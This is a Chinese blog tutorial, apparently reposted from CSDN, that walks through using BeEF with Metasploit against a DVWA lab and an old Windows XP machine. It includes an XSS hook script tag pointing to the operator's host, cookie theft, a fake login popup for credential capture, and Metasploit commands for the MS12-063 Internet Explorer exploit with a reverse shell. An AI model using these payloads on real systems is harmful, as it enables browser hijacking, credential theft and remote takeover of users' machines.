当前位置:   article > 正文

Kali BeEF MSF的使用

kali beef

0x00 BeEF

BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。

不过在目前,BeEF使用的人比较少,并且在新版Kali中已经没有默认安装了,这里简单记录下BeEF的使用。

在这里插入图片描述
测试环境:任意存在XSS漏洞的站点及kali2019

注意如果是在新版kali中则可以使用apt-get install beef-xss进行安装。


0x02 BeEF的使用

直接在命令行输入xss-beef即可使用,我这里多了一个提示,需要改变缺省密码,它的缺省密码是beef/beef
在这里插入图片描述
当程序启动完毕后,会自动打开浏览器,出现登陆界面。
在这里插入图片描述
当然也可以根据之前的Log信息进行操作,上面也有写登陆的地址,直接登陆这个地址也是可以的。
在这里插入图片描述
接下来,将上面的Hook打入到XSS漏洞环境中,这里要记得将<IP>换成kali的IP地址,这里拿都知道的DVWA靶场举例。

<script src="http://192.168.181.141:3000/hook.js"></script>
  • 1

直接插进去就行了。
在这里插入图片描述
然后登陆beef查看上线主机。
在这里插入图片描述
点击上线主机后,可以看到一些对应的信息。
在这里插入图片描述
点击command可以看到支持的攻击模块
在这里插入图片描述
这里由于软件有较久没有更新模块内容,所以有些功能可能无法使用的,可以通过命令前面的颜色来判断

  • 绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
  • 橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
  • 灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
  • 红色:命令模块不适用于此目标

这里拿Browser举例。
在这里插入图片描述
使用绿色的Get Cookie
在这里插入图片描述
点击Execute可以看到对应的信息
在这里插入图片描述
再拿橙色的Redirect Browser举例
在这里插入图片描述
点击Execute后用户界面会跳转到百度。
在这里插入图片描述
显示命令执行成功,查看客户端页面。
在这里插入图片描述
已经跳转成功,还可以使用社工模块中的弹窗等。
在这里插入图片描述
别说,还挺像的。。
在这里插入图片描述
输入后,可以在后台收到用户名密码信息
在这里插入图片描述
另外BeEF还可以联动MSF一起使用,不过具体功能还得大家自行研究了,这里贴下联动的方法。


0x03 MSF+BeEF

首先更改BeEF的第一个配置文件,开启MSF的加载模块。

vim /usr/share/beef-xss/config.yaml
  • 1

在这里插入图片描述
另外需要修改扩展模块中的MSF配置文件

vim /usr/share/beef-xss/extensions/metasploit/config.yaml
  • 1

在这里插入图片描述
保证红框内的配置即可,接着进MSF加载模块

load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123
  • 1

这里区分大小写,密码在刚刚的配置文件里面有
在这里插入图片描述
最后一步,去beef-xss目录下通过./xss-beef启动才行。

cd /usr/share/beef-xss/
./beef
  • 1
  • 2

在这里插入图片描述
再次登陆BeEF就可以看到已经加载了MSF模块了。
在这里插入图片描述
这里就可以通过加载好的msf模块直接打了,不过找了一圈也没看到可以直接利用的。。。这大概就是不香了的原因吧,最后换个机器xp玩一下。


0x04 MSF+BeEF实例

MSF使用MS12-063漏洞,配合BeEF完成getshell

由于MS12-063针对IE7/8/9有效果,这里客户机用XP测试,哎,用这么老的机器测试就是玩。

XP访问存储型XSS上线至BeEF
在这里插入图片描述
接着选择msf模块中的ms12-063命令模块,填入对应的payload
在这里插入图片描述
直接执行,本以为完事了,结果。。。
在这里插入图片描述
一直loadingshell拿到,没办法只能去msf中玩了。

#后来想了下也测试过了,其实这里还是去`rediresct brower`那里去控制客户端访问一次生成的页面就可以了。
#比如这里需要让他访问http://192.168.181.141:8888,才能正常上线
#而且正常上线后,这个地方还是会loading,也得去msf中才能看到shell,感觉没啥意义。。。
  • 1
  • 2
  • 3
msf6 > search ms12-063

Matching Modules
================

   #  Name                                        Disclosure Date  Rank  Check  Description
   -  ----                                        ---------------  ----  -----  -----------
   0  exploit/windows/browser/ie_execcommand_uaf  2012-09-14       good  No     MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

接着进入模块后进行设置

msf6 > use exploit/windows/browser/ie_execcommand_uaf
msf6 exploit(windows/browser/ie_execcommand_uaf) >  set uripath /
uripath => /
msf6 exploit(windows/browser/ie_execcommand_uaf) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.181.141:4445 
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.181.141:8080/
[*] Server started.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

接着在BeEF中使用Redirect Brower功能让客户机访问http://192.168.181.141:8080/
在这里插入图片描述
再去看MSF,就上线了。
在这里插入图片描述


0x05 闲语

没想到上周临时的想法试着去申请下博客专家,今天就收到消息,来了来了,CSDN认证博客专家,GOT it,新的开始,继续加油!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/514377
推荐阅读
相关标签
  

闽ICP备14008679号